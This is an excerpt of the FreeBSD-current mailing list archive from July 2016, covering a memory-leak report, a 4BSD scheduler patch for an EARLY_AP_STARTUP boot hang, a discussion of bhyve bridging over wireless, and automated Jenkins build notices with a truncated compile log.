SgSNSlQOltIT3C2UTtgfJkXAbwR5uziFgkywNmh6FO6P2TS1NJP13WMkW8TjL1lhwl4W r/1w== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc; bh=S4I360m9UNILwhou9E5e0CPJXZ34gNDehokqHAxHQks=; b=clBwi3nnp3h2O/WMWgrWHtu0LmW8401v0/4BWVfs07IRfPqJhqsgwMZ8eV2OOjcL3s oSc71Vm2RyyIBtHp813fnoOYGNXZ+F/dAy1DNA7lU8w4Z81dxkodxZkXlBvk3gpa3oBU XxDl7IWm3QcdJsPiryodVQr42vxGbakUU/zYH78Iea3sFfKAhLwMn4We4LfNZtxHNriH YbcS0h5+uG7hjnQ/qXtQZa92ixi8mdqKKvnQ+7f8HslnzOE28xQG6es2lRdHiLfbp0qJ iyxohXpt3JGmxdzIWAmsPy4vAHPTCuxufl1VGF+DYywvWlXewbSI5U49gxiDdofb3ub3 /OgQ== X-Gm-Message-State: AEkoousCET6xjj3rtY37nJhDV/R472lDtrkMbdXqPmSztvWuyUNPa/fnJMTIxiRFTOHv2cTDJJ1DiVLqKlEZkw== X-Received: by 10.237.44.66 with SMTP id f60mr71242405qtd.11.1469822035276; Fri, 29 Jul 2016 12:53:55 -0700 (PDT) MIME-Version: 1.0 Received: by 10.233.216.194 with HTTP; Fri, 29 Jul 2016 12:53:54 -0700 (PDT) In-Reply-To: <20160729215232.3f1c0ab6.ohartman@zedat.fu-berlin.de> References: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> <20160729215232.3f1c0ab6.ohartman@zedat.fu-berlin.de> From: Ngie Cooper Date: Fri, 29 Jul 2016 12:53:54 -0700 Message-ID: Subject: Re: CURRENT: memory leak? To: "O. Hartmann" Cc: Allan Jude , FreeBSD Current Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:53:56 -0000 On Fri, Jul 29, 2016 at 12:52 PM, O. Hartmann wrote: ... > This is after starting VBox and a Win 7 pro guest (just started, no login) with 3572 MB > memory reserved and 4 logical CPUs (VBox 5.0.26): > > root@localhost: [ports] vmstat -Hm | sort -rnk 2,3 | head -n 10 > solaris 53030 62088K - 23000705 > 16,32,64,128,256,512,1024,2048,4096,8192,32768 devbuf 20600 39751K - 21380 > 16,32,64,128,256,512,1024,2048,4096,8192,16384,65536 iprtheap 9335 16498K - > 12303 32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536 nvidia 8162 21261K > - 549305 16,32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536 sysctloid 6004 > 309K - 6125 16,32,64,128 acpica 5605 574K - 65245 > 16,32,64,128,256,512,1024,2048,4096 umtx 1728 216K - 1728 128 > ufs_dirhash 1543 678K - 7175 16,32,64,128,256,512,1024,2048 > pmc 1066 6679K - 1066 16,32,128,256,512,1024,4096,8192,65536 > kdtrace 950 218K - 113551 64,256 Could you please paste this in a pastebin or something? It's formatted weird in my "mail client" (Gmail). Thanks, -Ngie From owner-freebsd-current@freebsd.org Fri Jul 29 20:17:49 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 71D89BA8A60 for ; Fri, 29 Jul 2016 20:17:49 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from mailman.ysv.freebsd.org (unknown [127.0.1.3]) by mx1.freebsd.org (Postfix) with ESMTP id 5F37B11FF for ; Fri, 29 Jul 2016 20:17:49 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: by mailman.ysv.freebsd.org (Postfix) id 5E936BA8A5F; Fri, 29 Jul 2016 20:17:49 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 5E353BA8A5E for ; Fri, 29 Jul 2016 20:17:49 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from bigwig.baldwin.cx (bigwig.baldwin.cx [IPv6:2001:470:1f11:75::1]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 3FF7011FE for ; Fri, 29 Jul 2016 20:17:49 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from ralph.baldwin.cx (c-73-231-226-104.hsd1.ca.comcast.net [73.231.226.104]) by bigwig.baldwin.cx (Postfix) with ESMTPSA id B001AB980; Fri, 29 Jul 2016 16:17:47 -0400 (EDT) From: John Baldwin To: gljennjohn@gmail.com Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Date: Fri, 29 Jul 2016 13:17:42 -0700 Message-ID: <2732687.Cf9hD9SkSs@ralph.baldwin.cx> User-Agent: KMail/4.14.3 (FreeBSD/10.3-STABLE; KDE/4.14.3; amd64; ; ) In-Reply-To: <20160728003131.1f67bb78@ernst.home> References: <20160516122242.39249a54@ernst.home> <1758017.P1iqL9uSnF@ralph.baldwin.cx> <20160728003131.1f67bb78@ernst.home> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (bigwig.baldwin.cx); Fri, 29 Jul 2016 16:17:47 -0400 (EDT) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 20:17:49 -0000 On Thursday, July 28, 2016 12:31:31 AM Gary Jennejohn wrote: > Well, now I know that ULE is a prerequiste for EARLY_AP_STARTUP! I > wasn't aware of that. I prefer BSD and that's the scheduler I did > the first tests with. > > But with the ULE scheduler the system comes up all the way. > > It would be nice if the BSD scheduler could also be modified to > work with EARLY_AP_STARTUP. I wasn't able to reproduce your hang with 4BSD, but I think I see a possible problem. Try this: diff --git a/sys/kern/sched_4bsd.c b/sys/kern/sched_4bsd.c index 7de56b6..d53331a 100644 --- a/sys/kern/sched_4bsd.c +++ b/sys/kern/sched_4bsd.c @@ -327,7 +327,6 @@ maybe_preempt(struct thread *td) * - The current thread has a higher (numerically lower) or * equivalent priority. Note that this prevents curthread from * trying to preempt to itself. - * - It is too early in the boot for context switches (cold is set). * - The current thread has an inhibitor set or is in the process of * exiting. In this case, the current thread is about to switch * out anyways, so there's no point in preempting. If we did, @@ -348,7 +347,7 @@ maybe_preempt(struct thread *td) ("maybe_preempt: trying to run inhibited thread")); pri = td->td_priority; cpri = ctd->td_priority; - if (panicstr != NULL || pri >= cpri || cold /* || dumping */ || + if (panicstr != NULL || pri >= cpri /* || dumping */ || TD_IS_INHIBITED(ctd)) return (0); #ifndef FULL_PREEMPTION @@ -1127,7 +1126,7 @@ forward_wakeup(int cpunum) if ((!forward_wakeup_enabled) || (forward_wakeup_use_mask == 0 && forward_wakeup_use_loop == 0)) return (0); - if (!smp_started || cold || panicstr) + if (!smp_started || panicstr) return (0); forward_wakeups_requested++; -- John Baldwin From owner-freebsd-current@freebsd.org Fri Jul 29 21:07:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D7F19BA8B09 for ; Fri, 29 Jul 2016 21:07:50 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id CA49811EC; Fri, 29 Jul 2016 21:07:50 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 7272018A; Fri, 29 Jul 2016 21:07:50 +0000 (UTC) Date: Fri, 29 Jul 2016 21:07:49 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1600972556.55.1469826469775.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1318591275.54.1469815573106.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1318591275.54.1469815573106.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #500 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 21:07:50 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 00:07:09 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0E15ABA8814 for ; Sat, 30 Jul 2016 00:07:09 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 005CC1968; Sat, 30 Jul 2016 00:07:09 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 2BDE818E; Sat, 30 Jul 2016 00:07:09 +0000 (UTC) Date: Sat, 30 Jul 2016 00:07:08 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <64615616.56.1469837228734.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1600972556.55.1469826469775.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1600972556.55.1469826469775.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #501 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 00:07:09 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 00:27:17 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3638CBA8CB2 for ; Sat, 30 Jul 2016 00:27:17 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qk0-x234.google.com (mail-qk0-x234.google.com [IPv6:2607:f8b0:400d:c09::234]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id E16B61374 for ; Sat, 30 Jul 2016 00:27:16 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qk0-x234.google.com with SMTP id s63so105254132qkb.2 for ; Fri, 29 Jul 2016 17:27:16 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=IN2vx66q/fH1/w6AgkNUF5QvWdau/1N/Hf8LCJZZqpg=; b=E2McrkwMFfSIligZGKSk/lxhlJGn23vcSXbSfk53GHS2vlicfj+rzapkIiwYA8laiv 6m88cle4n56nd8ZrqUlZnYqMp0ohABmGeJuD+Gt67bODTJpT8kOivBdkArDmV36btTor Lx+1IejTrlZCLSAdfaOap/7LNWvaWe9xU3pQMIRtQc/ULGCrlApBAK7dKDkUlmS0jOOS bFYce5k3aGi3JDvU6c7WVT7e37R1TSG6hJc/BapEFwgTBsnzJqKH0HBL8Jqh85Wqyc9Y 8aNXv0aXIFCHGDt+RkaKSiPGouGfzzuqq/B8SD7Wya0faQ4qj23V9NHUe4B06PmtCHA2 fbQQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=IN2vx66q/fH1/w6AgkNUF5QvWdau/1N/Hf8LCJZZqpg=; b=ZzA2lbkRY+TihmKFWzq9CH28j3GmpKTaL5PI2ijRkx3X1HJBiYRFG66rL/uCPVuMfr MPHkUMb28+EFt5vglIyghC7ieEaoqw1UHwRzQHDeFRQPWbldOqvQFwK8UinEuI39Mb8M q1EMiba4hAUfPDsX8ZJwhfum26/9q9ydwXUCPWmPR37te+1E2hXyaZiHZuwh75My21u4 zxRt/bU6DyG1Fh40RugrQU9BheOTmT++cl3Z7T6iry+uiNetdabkV60Oa5wg4PfgjS8j p/mhxhJWGmnAfM/NslOznPbYEd1gW4y7kIIZwPMdomm9jSgXrBiM8bvrtdAUhu0hms7V 3cnQ== X-Gm-Message-State: AEkoouuwtwiKTg6qvFtHARVODjPtT2f6eW/XCzOuKr1tFYZy34mRwU12muF+0bPVFBYtSQ== X-Received: by 10.55.81.9 with SMTP id f9mr52043991qkb.194.1469838435881; Fri, 29 Jul 2016 17:27:15 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id a67sm11401103qkc.24.2016.07.29.17.26.57 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Fri, 29 Jul 2016 17:26:57 -0700 (PDT) Date: Fri, 29 Jul 2016 20:26:56 -0400 From: Randy Westlund To: John Nielsen Cc: freebsd-current@freebsd.org Subject: Re: bhyve with lagg failover doesn't work on wifi Message-ID: <20160730002656.GK26793@gmail.com> References: <20160729045652.GJ26793@gmail.com> <14F7DC55-3072-452F-AA70-1EA8701327E7@jnielsen.net> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="CqfQkoYPE/jGoa5Q" Content-Disposition: inline In-Reply-To: <14F7DC55-3072-452F-AA70-1EA8701327E7@jnielsen.net> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 00:27:17 -0000 --CqfQkoYPE/jGoa5Q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 29, 2016 at 01:06:52PM -0600, John Nielsen wrote: > Generally speaking, you can't bridge the station side of a wireless link.= The access point will only accept frames with the station's MAC address. S= o what you are seeing is expected, unfortunately. >=20 > Your best bet is probably to do NAT. Take lagg0 out of the bridge and use= it as your "public" interface. Assign a local IP to the bridge. Run a DHCP= server on your host (or in another VM on the bridge if you like) or just u= se static internal IPs on your VMs. Enable IP forwarding (gateway_enable=3D= yes in rc.conf). Configure your firewall to NAT your private range out lagg= 0. >=20 > You can do other things with tunneling, etc. but you'll need a remote end= point for the tunnel. (If your access point runs FreeBSD you can use either= vxlan or gif+EtherIP and just use the wireless link to carry the tunnel tr= affic, but I suspect that you want to roam between arbitrary access points.) Thanks for the explanation, that makes perfect sense. I hadn't considered the implications of a layer 2 bridge to a wireless link. --CqfQkoYPE/jGoa5Q Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXm/RQAAoJEGaweXjzNsmpbPIH/3xv5Kby7gtseHJAsTeOCewm OhtfOLrOlLAfMJ+kjxmpMWit5s/GtO2g33UgTV+is6kD2jkJpOdmW/Fx2bpEp+5k hkgEBvKWNFfEIWIl6Pyuy2Kdl7tsGtajEOulPYJiRLWGtBthE6RdKoEQI8o02E4v MRAhDdIhMT0gTK1MiTAHlPAmtAXV6J9AUmpZI283auY2aphfQ66liqPtkd+9hxUG 4xFNIrzca4K2Z7dC/lyYPqZH/NrjiGNb/ginqtTFxMLw2rfiw6SQn3Nf2YdQmI1R Z6/74poO5jYxMQZ3LzpJwKrZWI17M8ycAVYYZhojPXWCbLHJcnogX5oY3ZiH80w= =I7Lm -----END PGP SIGNATURE----- --CqfQkoYPE/jGoa5Q-- From owner-freebsd-current@freebsd.org Sat Jul 30 03:08:22 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 800C2BA756A for ; Sat, 30 Jul 2016 03:08:22 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 7261B1194; Sat, 30 Jul 2016 03:08:22 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 28636193; Sat, 30 Jul 2016 03:08:21 +0000 (UTC) Date: Sat, 30 Jul 2016 03:08:15 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1396805328.57.1469848098913.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <64615616.56.1469837228734.JavaMail.jenkins@jenkins-9.freebsd.org> References: <64615616.56.1469837228734.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #502 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 03:08:22 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 03:32:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E8BA6BA7CD8; Sat, 30 Jul 2016 03:32:56 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id D5ADA15B5; Sat, 30 Jul 2016 03:32:56 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id BEABC195; Sat, 30 Jul 2016 03:32:56 +0000 (UTC) Date: Sat, 30 Jul 2016 03:32:54 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: markj@FreeBSD.org, ache@FreeBSD.org, bapt@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org, freebsd-i386@FreeBSD.org Message-ID: <1700567250.59.1469849576789.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_i386 - Build #3721 - Failure MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_i386 X-Jenkins-Result: FAILURE Precedence: bulk Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 03:32:57 -0000 FreeBSD_HEAD_i386 - Build #3721 - Failure: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3721/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3721/cha= nges Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3721/cons= ole Change summaries: 303536 by ache: Rework r303074 case 4. Don't immediatelly skip directory entries which cause MAXPATHLEN exceeded. Process them first through gl_errfunc() and GLOB_ERR. 303535 by markj: Include fasttrap handling for DATAMODEL_ILP32 when compiling for amd64. MFC after:=091 month 303534 by markj: libdtrace: Don't hard-code the native data model. MFC after:=091 month 303533 by markj: libproc: Add proc_getmodel(). This is used by libdtrace to determine the data model of target processes. This allows for the creation of pid provider probes in 32-bit processes on amd64. MFC after:=091 month 303532 by markj: Add descriptions for fields in struct proc_handle. Remove the unused kq field and some unnecessary includes. MFC after:=091 month 303531 by markj: librtld_db: Use the auxv to figure out where to look up loader symbols. Previously, librtld_db just hardcoded /libexec/ld-elf.so, which isn't correct for processes that aren't using the native ABI. With this change, librtld_db can be used to inspect non-native processes; in particular, dtrace -c now works for 32-bit executables on amd64. MFC after:=091 month 303530 by ache: Reset errno for readdirfunc() before contunue. 303529 by bapt: Remove usage of _WITH_DPRINTF The end of the build log: [...truncated 43082 lines...] --- secure/lib/libcrypto__L --- --- x_bignum.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_bignum.o -MTx_bignum.o -std=3Dgnu89 -fstack-protector-strong -Wno-poin= ter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -W= no-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-un= used-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -W= no-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argum= ents -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/= x_bignum.c -o x_bignum.o --- lib/msun__L --- --- e_acosl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_acosl.So -MTe_acosl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/e_acosl.c -o e_acosl.So --- e_asinl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_asinl.So -MTe_asinl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/e_asinl.c -o e_asinl.So --- secure/lib/libcrypto__L --- --- x_crl.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_crl.o -MTx_crl.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-si= gn -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tau= tological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-f= unction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swi= tch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments = -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_crl.= c -o x_crl.o --- lib/msun__L --- --- e_atan2l.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_atan2l.So -MTe_atan2l.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body 